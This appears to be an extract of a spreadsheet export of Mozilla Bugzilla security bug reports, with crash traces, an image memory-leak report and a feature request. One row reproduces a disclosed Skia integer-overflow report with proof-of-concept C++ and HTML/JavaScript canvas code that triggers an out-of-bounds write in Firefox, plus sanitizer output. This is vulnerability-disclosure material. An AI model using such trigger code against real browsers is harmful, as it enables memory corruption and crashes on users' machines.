 Crash by hitting an assert
 dragStart got element  Assertion failure: pc &lt; endpc, at /scratchbox/users/steakdepapillon/home/steakdepapillon/mozilla-central/js/src/jsobj.cpp:2291
Expected results:
 Nothing special</t>
        </is>
      </c>
      <c r="X6201" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6202">
      <c r="A6202" t="n">
        <v>891693</v>
      </c>
      <c r="B6202" t="inlineStr">
        <is>
          <t>2013-07-09 20:40:06 -0700</t>
        </is>
      </c>
      <c r="C6202" t="inlineStr">
        <is>
          <t>JPEG info leak</t>
        </is>
      </c>
      <c r="D6202" t="inlineStr">
        <is>
          <t>2024-05-30 08:05:20 -0700</t>
        </is>
      </c>
      <c r="E6202" t="n">
        <v>1</v>
      </c>
      <c r="F6202" t="n">
        <v>1</v>
      </c>
      <c r="G6202" t="n">
        <v>3</v>
      </c>
      <c r="H6202" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6202" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J6202" t="inlineStr">
        <is>
          <t>Graphics: ImageLib</t>
        </is>
      </c>
      <c r="K6202" t="inlineStr">
        <is>
          <t>22 Branch</t>
        </is>
      </c>
      <c r="L6202" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M6202" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N6202" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6202" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6202" t="inlineStr">
        <is>
          <t>[reporter-external][adv-main26+][adv-esr24.2+]</t>
        </is>
      </c>
      <c r="Q6202" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R6202" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6202" t="inlineStr">
        <is>
          <t>mozilla28</t>
        </is>
      </c>
      <c r="T6202" t="n">
        <v>1</v>
      </c>
      <c r="U6202" t="n">
        <v>0</v>
      </c>
      <c r="V6202" t="n">
        <v>77</v>
      </c>
      <c r="W6202" t="inlineStr">
        <is>
          <t>This page contains an alternating pattern of kitty.jpg (a legit hello kitty image) and 55.jpg, an image that is 'decoded' to what looks like uninitialized memory:
http://lcamtuf.coredump.cx/jpeg_leak/
In most browsers, reloading this page a couple of times eventually causes a distorted version of 'hello kitty' to appear in one of the 55.jpg squares. In Firefox, it's relatively difficult to hit that condition, but it still happens every now and then.
At the bare minimum, this + &lt;canvas&gt; seems like a way to steal images across domains, although I suspect that the memory may contain non-image stuff, too.
Safari &amp; others are also affected.</t>
        </is>
      </c>
      <c r="X6202" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6203">
      <c r="A6203" t="n">
        <v>232095</v>
      </c>
      <c r="B6203" t="inlineStr">
        <is>
          <t>2004-01-24 23:50:04 -0800</t>
        </is>
      </c>
      <c r="C6203" t="inlineStr">
        <is>
          <t>[FIX]JS syntax error in XBL binding used twice crashes Mozilla</t>
        </is>
      </c>
      <c r="D6203" t="inlineStr">
        <is>
          <t>2009-05-09 10:34:33 -0700</t>
        </is>
      </c>
      <c r="E6203" t="n">
        <v>1</v>
      </c>
      <c r="F6203" t="n">
        <v>1</v>
      </c>
      <c r="G6203" t="n">
        <v>3</v>
      </c>
      <c r="H6203" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6203" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J6203" t="inlineStr">
        <is>
          <t>XBL</t>
        </is>
      </c>
      <c r="K6203" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L6203" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M6203" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N6203" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6203" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6203" t="inlineStr"/>
      <c r="Q6203" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R6203" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S6203" t="inlineStr">
        <is>
          <t>mozilla1.7alpha</t>
        </is>
      </c>
      <c r="T6203" t="n">
        <v>1</v>
      </c>
      <c r="U6203" t="n">
        <v>0</v>
      </c>
      <c r="V6203" t="n">
        <v>7</v>
      </c>
      <c r="W6203" t="inlineStr">
        <is>
          <t>Crash testcase coming up.  Stack appears to be corrupted...  Just in case it's not:
#0  0x405a46f6 in nanosleep () from /lib/libc.so.6
#1  0x0000001c in ?? ()
#2  0x080721be in ah_crap_handler(int) (signum=11) at nsSigHandlers.cpp:135
#3  0x419338a9 in nsProfileLock::FatalSignalHandler(int) (signo=11)
    at nsProfileLock.cpp:209
#4  0x4012bc2d in __pthread_sighandler () from /lib/libpthread.so.0
#5  0x4051fd58 in __libc_sigaction () from /lib/libc.so.6
#6  0x41473a6a in nsXBLProtoImplMethod::InstallMember(nsIScriptContext*,
nsIContent*, void*, void*, nsCString const&amp;) (this=0x87cf930, aContext=0x869efb0,
    aBoundElement=0x87a67e8, aScriptObject=0x83e0cf0,
    aTargetClassObject=0x83e0d00, aClassStr=@0x87cf5b0)
    at nsXBLProtoImplMethod.cpp:183
#7  0x414749b6 in nsXBLProtoImpl::InstallImplementation(nsXBLPrototypeBinding*,
nsIContent*) (this=0x87cf5b0, aBinding=0x876c578, aBoundElement=0x87a67e8)
    at nsXBLProtoImpl.cpp:84
#8  0x41465976 in nsXBLPrototypeBinding::InstallImplementation(nsIContent*) (
    this=0x876c578, aBoundElement=0x87a67e8) at nsXBLPrototypeBinding.cpp:440
#9  0x414614b2 in nsXBLBinding::InstallImplementation() (this=0x87cf858)
    at nsXBLBinding.cpp:814
#10 0x4147f22a in nsXBLService::LoadBindings(nsIContent*, nsIURI*, int,
nsIXBLBinding**, int*) (this=0x82042e8, aContent=0x87a67e8, aURL=0x87ae308,
    aAugmentFlag=0, aBinding=0xbfffe680, aResolveStyle=0xbfffe678)
    at nsXBLService.cpp:632
#11 0x411172d7 in nsCSSFrameConstructor::ConstructFrameInternal(nsIPresShell*,
n---Type &lt;return&gt; to continue, or q &lt;return&gt; to quit---
sIPresContext*, nsFrameConstructorState&amp;, nsIContent*, nsIFrame*, nsIAtom*, int,
nsStyleContext*, nsFrameItems&amp;, int) (this=0x83daba0, aPresShell=0x86eade8,
    aPresContext=0x87562f8, aState=@0xbfffe820, aContent=0x87a67e8,
    aParentFrame=0x8782e44, aTag=0x87d3210, aNameSpaceID=9,
    aStyleContext=0x8783688, aFrameItems=@0xbfffe800, aXBLBaseTag=0)
    at nsCSSFrameConstructor.cpp:7025
#12 0x41117183 in nsCSSFrameConstructor::ConstructFrame(nsIPresShell*,
nsIPresContext*, nsFrameConstructorState&amp;, nsIContent*, nsIFrame*, nsFrameItems&amp;) (
    this=0x83daba0, aPresShell=0x86eade8, aPresContext=0x87562f8,
    aState=@0xbfffe820, aContent=0x87a67e8, aParentFrame=0x8782e44,
    aFrameItems=@0xbfffe800) at nsCSSFrameConstructor.cpp:6981
#13 0x4111c074 in nsCSSFrameConstructor::ContentInserted(nsIPresContext*,
nsIContent*, nsIFrame*, nsIContent*, int, nsILayoutHistoryState*, int) (
    this=0x83daba0, aPresContext=0x87562f8, aContainer=0x87ac8d0,
    aContainerFrame=0x0, aChild=0x87a67e8, aIndexInContainer=3,
    aFrameState=0x0, aInContentReplaced=0) at nsCSSFrameConstructor.cpp:8899
#14 0x4109f866 in PresShell::ContentInserted(nsIDocument*, nsIContent*,
nsIContent*, int) (this=0x86eade8, aDocument=0x87d1360, aContainer=0x87ac8d0,
    aChild=0x87a67e8, aIndexInContainer=3) at nsPresShell.cpp:5266
#15 0x41482b2a in nsXBLBindingRequest::DocumentLoaded(nsIDocument*) (
    this=0x8204348, aBindingDoc=0x87dc968) at nsXBLService.cpp:178
#16 0x4147dd9f in nsXBLStreamListener::Load(nsIDOMEvent*) (this=0x87d0f20,
    aEvent=0x87bedb0) at nsXBLService.cpp:429
#17 0x412d7597 in DispatchToInterface (aEvent=0x87bedb0, aListener=0x87d0f24,
---Type &lt;return&gt; to continue, or q &lt;return&gt; to quit---
    aMethod={__pfn = 0x11, __delta = 0}, aIID=@0x415b7c3c,
    aHasInterface=0xbfffeb28) at nsEventListenerManager.cpp:128
#18 0x412db353 in nsEventListenerManager::HandleEvent(nsIPresContext*, nsEvent*,
nsIDOMEvent**, nsIDOMEventTarget*, unsigned, nsEventStatus*) (this=0x87d0f78,
    aPresContext=0x0, aEvent=0xbfffec50, aDOMEvent=0xbfffebc4,
    aCurrentTarget=0x87dca00, aFlags=7, aEventStatus=0xbfffec8c)
    at nsEventListenerManager.cpp:1504
#19 0x41220840 in nsDocument::HandleDOMEvent(nsIPresContext*, nsEvent*,
nsIDOMEvent**, unsigned, nsEventStatus*) (this=0x87dc968, aPresContext=0x0,
    aEvent=0xbfffec50, aDOMEvent=0xbfffebc4, aFlags=7, aEventStatus=0xbfffec8c)
    at nsDocument.cpp:3632
#20 0x4145820f in nsXMLDocument::EndLoad() (this=0x87dc968)
    at nsXMLDocument.cpp:667
#21 0x4144d29e in nsXMLContentSink::DidBuildModel() (this=0x87e9d38)
    at nsXMLContentSink.cpp:290
#22 0x419d2124 in nsExpatDriver::DidBuildModel(unsigned, int, nsIParser*,
nsIContentSink*) (this=0x87c9478, anErrorCode=0, aNotifySink=1, aParser=0x87d0dd0,
    aSink=0x87e9d88) at nsExpatDriver.cpp:1042
#23 0x419f0212 in nsParser::DidBuildModel(unsigned) (this=0x87d0dd0,
    anErrorCode=0) at nsParser.cpp:1245
#24 0x419f12e3 in nsParser::ResumeParse(int, int, int) (this=0x87d0dd0,
    allowIteration=1, aIsFinalChunk=1, aCanInterrupt=1) at nsParser.cpp:1806
#25 0x419f304b in nsParser::OnStopRequest(nsIRequest*, nsISupports*, unsigned)
    (this=0x87d0dd0, request=0x87086b8, aContext=0x0, status=0)
---Type &lt;return&gt; to continue, or q &lt;return&gt; to quit---
    at nsParser.cpp:2472
#26 0x4147d750 in nsXBLStreamListener::OnStopRequest(nsIRequest*, nsISupports*,
unsigned) (this=0x87d0f20, request=0x87086b8, aCtxt=0x0, aStatus=0)
    at nsXBLService.cpp:322
#27 0x40c16ae1 in nsFileChannel::OnStopRequest(nsIRequest*, nsISupports*,
unsigned) (this=0x87086b8, req=0x87d10e0, ctx=0x0, status=0) at
nsFileChannel.cpp:577
#28 0x40b81318 in nsInputStreamPump::OnStateStop() (this=0x87d10e0)
    at nsInputStreamPump.cpp:498
#29 0x40b80cdb in nsInputStreamPump::OnInputStreamReady(nsIAsyncInputStream*) (
    this=0x87d10e0, stream=0x87d1234) at nsInputStreamPump.cpp:339
#30 0x407f49d1 in nsInputStreamReadyEvent::EventHandler(PLEvent*) (
    plevent=0x8758ce4) at nsStreamUtils.cpp:118
#31 0x4081a2f4 in PL_HandleEvent (self=0x8758ce4) at plevent.c:671
#32 0x4081a195 in PL_ProcessPendingEvents (self=0x813e118) at plevent.c:606
#33 0x4081d4ca in nsEventQueueImpl::ProcessPendingEvents() (this=0x813df08)
    at nsEventQueue.cpp:391
#34 0x41888d74 in event_processor_callback (data=0x813df08, source=4,
    condition=GDK_INPUT_READ) at nsAppShell.cpp:186
#35 0x418886dd in our_gdk_io_invoke (source=0x8262f90, condition=G_IO_IN,
    data=0x8286080) at nsAppShell.cpp:71
#36 0x4030d7d6 in g_io_channel_unix_get_fd () from /usr/lib/libglib-1.2.so.0
#37 0x403103ee in g_idle_remove_by_data () from /usr/lib/libglib-1.2.so.0
#38 0x40310199 in g_idle_remove_by_data () from /usr/lib/libglib-1.2.so.0
#39 0x4030f174 in g_main_run () from /usr/lib/libglib-1.2.so.0
On frame 6:
#6  0x41473a6a in nsXBLProtoImplMethod::InstallMember(nsIScriptContext*,
nsIContent*, void*, void*, nsCString const&amp;) (this=0x87cf930, aContext=0x869efb0,
    aBoundElement=0x87a67e8, aScriptObject=0x83e0cf0,
    aTargetClassObject=0x83e0d00, aClassStr=@0x87cf5b0)
    at nsXBLProtoImplMethod.cpp:183
183         JSObject * method = ::JS_CloneFunctionObject(cx, mJSMethodObject,
globalObject);
(gdb) print mJSMethodObject
No symbol "mJSMethodObject" in current context.
Per line 181 of nsXBLProtoImplMethod.cpp, you would think this isn't even called...
Also reference bug 231396, which has a JS syntax error unreported by XBL (but
does not crash).  Crash testcase coming up.</t>
        </is>
      </c>
      <c r="X6203" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6204">
      <c r="A6204" t="n">
        <v>629858</v>
      </c>
      <c r="B6204" t="inlineStr">
        <is>
          <t>2011-01-29 01:06:51 -0800</t>
        </is>
      </c>
      <c r="C6204" t="inlineStr">
        <is>
          <t>strict warning "function f does not always return a value" can cause buffer overreads</t>
        </is>
      </c>
      <c r="D6204" t="inlineStr">
        <is>
          <t>2013-01-14 08:40:53 -0800</t>
        </is>
      </c>
      <c r="E6204" t="n">
        <v>1</v>
      </c>
      <c r="F6204" t="n">
        <v>1</v>
      </c>
      <c r="G6204" t="n">
        <v>3</v>
      </c>
      <c r="H6204" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6204" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J6204" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K6204" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L6204" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M6204" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N6204" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6204" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6204" t="inlineStr">
        <is>
          <t>[sg:moderate], [needs 1.9.2 landing] fixed-in-tracemonkey</t>
        </is>
      </c>
      <c r="Q6204" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R6204" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S6204" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T6204" t="n">
        <v>1</v>
      </c>
      <c r="U6204" t="n">
        <v>0</v>
      </c>
      <c r="V6204" t="n">
        <v>55</v>
      </c>
      <c r="W6204" t="inlineStr">
        <is>
          <t>Created attachment 508088
unreduced fragile testcase
I tried but somehow failed to get a Windows environment with symbols for a js shell, but nonetheless attaching what I have.
The testcase is extremely fragile but somewhat reproducible. It doesn't seem to affect debug shells. Assuming worse-case [sg:critical?] pending further analysis.</t>
        </is>
      </c>
      <c r="X6204" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6205">
      <c r="A6205" t="n">
        <v>945603</v>
      </c>
      <c r="B6205" t="inlineStr">
        <is>
          <t>2013-12-02 22:41:04 -0800</t>
        </is>
      </c>
      <c r="C6205" t="inlineStr">
        <is>
          <t>[RTSP] Support Rtsp Protocol in URL Bar on b2g Browser</t>
        </is>
      </c>
      <c r="D6205" t="inlineStr">
        <is>
          <t>2015-03-17 01:26:46 -0700</t>
        </is>
      </c>
      <c r="E6205" t="n">
        <v>1</v>
      </c>
      <c r="F6205" t="n">
        <v>1</v>
      </c>
      <c r="G6205" t="n">
        <v>6</v>
      </c>
      <c r="H6205" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I6205" t="inlineStr">
        <is>
          <t>Firefox OS Graveyard</t>
        </is>
      </c>
      <c r="J6205" t="inlineStr">
        <is>
          <t>RTSP</t>
        </is>
      </c>
      <c r="K6205" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L6205" t="inlineStr">
        <is>
          <t>ARM</t>
        </is>
      </c>
      <c r="M6205" t="inlineStr">
        <is>
          <t>Gonk (Firefox OS)</t>
        </is>
      </c>
      <c r="N6205" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O6205" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6205" t="inlineStr">
        <is>
          <t>1.3tarakorun2 [p=1]</t>
        </is>
      </c>
      <c r="Q6205" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R6205" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S6205" t="inlineStr">
        <is>
          <t>2.0 S1 (9may)</t>
        </is>
      </c>
      <c r="T6205" t="n">
        <v>1</v>
      </c>
      <c r="U6205" t="n">
        <v>0</v>
      </c>
      <c r="V6205" t="n">
        <v>35</v>
      </c>
      <c r="W6205" t="inlineStr">
        <is>
          <t>This is a follow-up bug of bug 884702.
In bug 884702, we made rtsp a non-exposed protocol in b2g OS and also added an external handler for rtsp scheme, which would launch video app. The result is that we support &lt;a href="rtsp://some-url"&gt; for now.
We would also like to support rtsp in URL bar.
If feasible, url bar code could do an exposed-protocol check.</t>
        </is>
      </c>
      <c r="X6205" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6206">
      <c r="A6206" t="n">
        <v>1441941</v>
      </c>
      <c r="B6206" t="inlineStr">
        <is>
          <t>2018-02-28 10:26:09 -0800</t>
        </is>
      </c>
      <c r="C6206" t="inlineStr">
        <is>
          <t>Skia and Firefox: Integer overflow in SkTDArray leading to out-of-bounds write</t>
        </is>
      </c>
      <c r="D6206" t="inlineStr">
        <is>
          <t>2019-05-24 05:02:04 -0700</t>
        </is>
      </c>
      <c r="E6206" t="n">
        <v>1</v>
      </c>
      <c r="F6206" t="n">
        <v>1</v>
      </c>
      <c r="G6206" t="n">
        <v>3</v>
      </c>
      <c r="H6206" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6206" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J6206" t="inlineStr">
        <is>
          <t>Graphics</t>
        </is>
      </c>
      <c r="K6206" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L6206" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M6206" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N6206" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6206" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6206" t="inlineStr">
        <is>
          <t>[disclosure deadline May 30][adv-main60+][adv-esr52.8+]</t>
        </is>
      </c>
      <c r="Q6206" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R6206" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6206" t="inlineStr">
        <is>
          <t>mozilla61</t>
        </is>
      </c>
      <c r="T6206" t="n">
        <v>1</v>
      </c>
      <c r="U6206" t="n">
        <v>0</v>
      </c>
      <c r="V6206" t="n">
        <v>19</v>
      </c>
      <c r="W6206" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.186 Safari/537.36
Steps to reproduce:
Hi, below is a bug report for a bug I also reported today in the Skia issue tracker (https://bugs.chromium.org/p/skia/issues/detail?id=7674). I assume it will be handled over there, but since this is a security issue impacting Firefox and since it is under 90-day disclosure deadline I am reporting it here as well. I also want to raise attention to the fact that Skia in Mozilla repository is at least several months behind the version in https://cs.chromium.org so apart from this issue you are also affected by other issues that are already fixed in the main repo.
Please let me know how you would prefer to handle issues like this in the future.
Original report follows:
***Please note: This bug is subject to a 90 day disclosure deadline. After 90 days elapse or a patch has been made broadly available, the bug report will become visible to the public.***
In Skia, SkTDArray stores length (fCount) and capacity (fReserve) as 32-bit ints and does not perform any integer overflow checks. There are a couple of places where an integer overflow could occur:
(1) https://cs.chromium.org/chromium/src/third_party/skia/include/private/SkTDArray.h?rcl=a93a14a99816d25b773f0b12868143702baf44bf&amp;l=369
(2) https://cs.chromium.org/chromium/src/third_party/skia/include/private/SkTDArray.h?rcl=a93a14a99816d25b773f0b12868143702baf44bf&amp;l=382
(3) https://cs.chromium.org/chromium/src/third_party/skia/include/private/SkTDArray.h?rcl=a93a14a99816d25b773f0b12868143702baf44bf&amp;l=383
and possibly others
In addition, on 32-bit systems, multiplication integer overflows could occur in several places where expressions such as
fReserve * sizeof(T)
sizeof(T) * count
etc. are used.
An integer overflow in (2) above is especially dangerous as it will cause too little memory to be allocated to hold the array which will cause a out-of-bounds write when e.g. appending an element.
I have successfully demonstrated the issue by causing an overflow in fPts array in SkPathMeasure (https://cs.chromium.org/chromium/src/third_party/skia/include/core/SkPathMeasure.h?l=104&amp;rcl=23d97760248300b7aec213a36f8b0485857240b5) which is used when rendering dashed paths.
The PoC requires a lot of memory (My estimate is 16+1 GB for storing the path, additional 16GB for the SkTDArray we are corrupting), however there might be less demanding paths for triggering SkTDArray integer overflows.
PoC program for Skia
=================================================================
#include &lt;stdio.h&gt;
#include "SkCanvas.h"
#include "SkPath.h"
#include "SkGradientShader.h"
#include "SkBitmap.h"
#include "SkDashPathEffect.h"
int main (int argc, char * const argv[]) {
    SkBitmap bitmap;
    bitmap.allocN32Pixels(500, 500);
    //Create Canvas
    SkCanvas canvas(bitmap);
    SkPaint p;
    p.setAntiAlias(false);
    float intervals[] = { 0, 10e9f };
    p.setStyle(SkPaint::kStroke_Style);
    p.setPathEffect(SkDashPathEffect::Make(intervals, SK_ARRAY_COUNT(intervals), 0));
    SkPath path;
    unsigned quadraticarr[] = {13, 68, 258, 1053, 1323, 2608, 10018, 15668, 59838, 557493, 696873, 871098, 4153813, 15845608, 48357008, 118059138, 288230353, 360287948, 562949933, 703687423, 1099511613, 0};
    path.moveTo(0, 0);
    unsigned numpoints = 1;
    unsigned i = 1;
    unsigned qaindex = 0;
    while(numpoints &lt; 2147483647) {
      if(numpoints == quadraticarr[qaindex]) {
        path.quadTo(i, 0, i, 0);
        qaindex++;
        numpoints += 2;
      } else {
        path.lineTo(i, 0);
        numpoints += 1;
      }
      i++;
      if(i == 1000000) {
        path.moveTo(0, 0);
        numpoints += 1;
        i = 1;
      }
    }
    printf("done building path\n");
    canvas.drawPath(path, p);
    return 0;
}
=================================================================
ASan output:
ASAN:DEADLYSIGNAL
=================================================================
==39779==ERROR: AddressSanitizer: SEGV on unknown address 0x7fefc321c7d8 (pc 0x7ff2dac9cf66 bp 0x7ffcb5a46540 sp 0x7ffcb5a45cc8 T0)
    #0 0x7ff2dac9cf65  (/lib/x86_64-linux-gnu/libc.so.6+0x83f65)
    #1 0x7bb66c in __asan_memcpy (/usr/local/google/home/ifratric/p0/skia/skia/out/asan/SkiaSDLExample+0x7bb66c)
    #2 0xcb2a33 in SkTDArray&lt;SkPoint&gt;::append(int, SkPoint const*) /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../include/private/../private/SkTDArray.h:184:17
    #3 0xcb8b9a in SkPathMeasure::buildSegments() /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/core/SkPathMeasure.cpp:341:21
    #4 0xcbb5f4 in SkPathMeasure::getLength() /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/core/SkPathMeasure.cpp:513:9
    #5 0xcbb5f4 in SkPathMeasure::nextContour() /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/core/SkPathMeasure.cpp:688
    #6 0x1805c14 in SkDashPath::InternalFilter(SkPath*, SkPath const&amp;, SkStrokeRec*, SkRect const*, float const*, int, float, int, float, SkDashPath::StrokeRecApplication) /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/utils/SkDashPath.cpp:482:14
    #7 0xe9cf60 in SkDashImpl::filterPath(SkPath*, SkPath const&amp;, SkStrokeRec*, SkRect const*) const /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/effects/SkDashPathEffect.cpp:40:12
    #8 0xc8fbef in SkPaint::getFillPath(SkPath const&amp;, SkPath*, SkRect const*, float) const /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/core/SkPaint.cpp:1500:24
    #9 0xbdbc26 in SkDraw::drawPath(SkPath const&amp;, SkPaint const&amp;, SkMatrix const*, bool, bool, SkBlitter*, SkInitOnceData*) const /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/core/SkDraw.cpp:1120:18
    #10 0x169b16e in SkDraw::drawPath(SkPath const&amp;, SkPaint const&amp;, SkMatrix const*, bool) const /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/core/SkDraw.h:58:9
    #11 0x169b16e in SkBitmapDevice::drawPath(SkPath const&amp;, SkPaint const&amp;, SkMatrix const*, bool) /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/core/SkBitmapDevice.cpp:226
    #12 0xb748d1 in SkCanvas::onDrawPath(SkPath const&amp;, SkPaint const&amp;) /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/core/SkCanvas.cpp:2167:9
    #13 0xb6b01a in SkCanvas::drawPath(SkPath const&amp;, SkPaint const&amp;) /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/core/SkCanvas.cpp:1757:5
    #14 0x8031dc in main /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../example/SkiaSDLExample.cpp:49:5
    #15 0x7ff2dac392b0 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x202b0)
    #16 0x733519 in _start (/usr/local/google/home/ifratric/p0/skia/skia/out/asan/SkiaSDLExample+0x733519)
The issue can also be triggered via the web in Mozilla Firefox
PoC for Mozilla Firefox on Linux (I used Firefox ASan build from https://developer.mozilla.org/en-US/docs/Mozilla/Testing/Firefox_and_Address_Sanitizer)
=================================================================
&lt;canvas id="canvas" width="64" height="64"&gt;&lt;/canvas&gt;
&lt;br&gt;
&lt;button onclick="go()"&gt;go&lt;/button&gt;
&lt;script&gt;
var canvas = document.getElementById("canvas");
var ctx = canvas.getContext("2d");
function go() {
  ctx.beginPath();
  ctx.mozImageSmoothingEnabled = false;
  ctx.webkitImageSmoothingEnabled = false;
  ctx.msImageSmoothingEnabled = false;
  ctx.imageSmoothingEnabled = false;
  linedasharr = [0, 1e+37];
  ctx.setLineDash(linedasharr);
  quadraticarr = [13, 68, 258, 1053, 1323, 2608, 10018, 15668, 59838, 557493, 696873, 871098, 4153813, 15845608, 48357008, 118059138, 288230353, 360287948, 562949933, 703687423, 1099511613];
  ctx.moveTo(0, 0);
  numpoints = 1;
  i = 1;
  qaindex = 0;
  while(numpoints &lt; 2147483647) {
    if(numpoints == quadraticarr[qaindex]) {
      ctx.quadraticCurveTo(i, 0, i, 0);
      qaindex++;
      numpoints += 2;
    } else {
      ctx.lineTo(i, 0);
      numpoints += 1;
    }
    i++;
    if(i == 1000000) {
      ctx.moveTo(0, 0);
      numpoints += 1;
      i = 1;
    }
  }
  alert("done building path");
  ctx.stroke();
  alert("exploit failed");
}
&lt;/script&gt;
=================================================================
ASan output:
AddressSanitizer:DEADLYSIGNAL
=================================================================
==37732==ERROR: AddressSanitizer: SEGV on unknown address 0x7ff86d20e7d8 (pc 0x7ff7c1233701 bp 0x7fffd19dd5f0 sp 0x7fffd19dd420 T0)
==37732==The signal is caused by a WRITE memory access.
    #0 0x7ff7c1233700 in append /builds/worker/workspace/build/src/gfx/skia/skia/include/core/../private/SkTDArray.h:184:17
    #1 0x7ff7c1233700 in SkPathMeasure::buildSegments() /builds/worker/workspace/build/src/gfx/skia/skia/src/core/SkPathMeasure.cpp:342
    #2 0x7ff7c1235be1 in getLength /builds/worker/workspace/build/src/gfx/skia/skia/src/core/SkPathMeasure.cpp:516:15
    #3 0x7ff7c1235be1 in SkPathMeasure::nextContour() /builds/worker/workspace/build/src/gfx/skia/skia/src/core/SkPathMeasure.cpp:688
    #4 0x7ff7c112905e in SkDashPath::InternalFilter(SkPath*, SkPath const&amp;, SkStrokeRec*, SkRect const*, float const*, int, float, int, float, SkDashPath::StrokeRecApplication) /builds/worker/workspace/build/src/gfx/skia/skia/src/utils/SkDashPath.cpp:307:19
    #5 0x7ff7c0bf9ed0 in SkDashPathEffect::filterPath(SkPath*, SkPath const&amp;, SkStrokeRec*, SkRect const*) const /builds/worker/workspace/build/src/gfx/skia/skia/src/effects/SkDashPathEffect.cpp:40:12
    #6 0x7ff7c1210ed6 in SkPaint::getFillPath(SkPath const&amp;, SkPath*, SkRect const*, float) const /builds/worker/workspace/build/src/gfx/skia/skia/src/core/SkPaint.cpp:1969:37
    #7 0x7ff7c0ec9156 in SkDraw::drawPath(SkPath const&amp;, SkPaint const&amp;, SkMatrix const*, bool, bool, SkBlitter*) const /builds/worker/workspace/build/src/gfx/skia/skia/src/core/SkDraw.cpp:1141:25
    #8 0x7ff7c0b8de4b in drawPath /builds/worker/workspace/build/src/gfx/skia/skia/src/core/SkDraw.h:55:15
    #9 0x7ff7c0b8de4b in SkBitmapDevice::drawPath(SkPath const&amp;, SkPaint const&amp;, SkMatrix const*, bool) /builds/worker/workspace/build/src/gfx/skia/skia/src/core/SkBitmapDevice.cpp:235
    #10 0x7ff7c0bbc691 in SkCanvas::onDrawPath(SkPath const&amp;, SkPaint const&amp;) /builds/worker/workspace/build/src/gfx/skia/skia/src/core/SkCanvas.cpp:2227:23
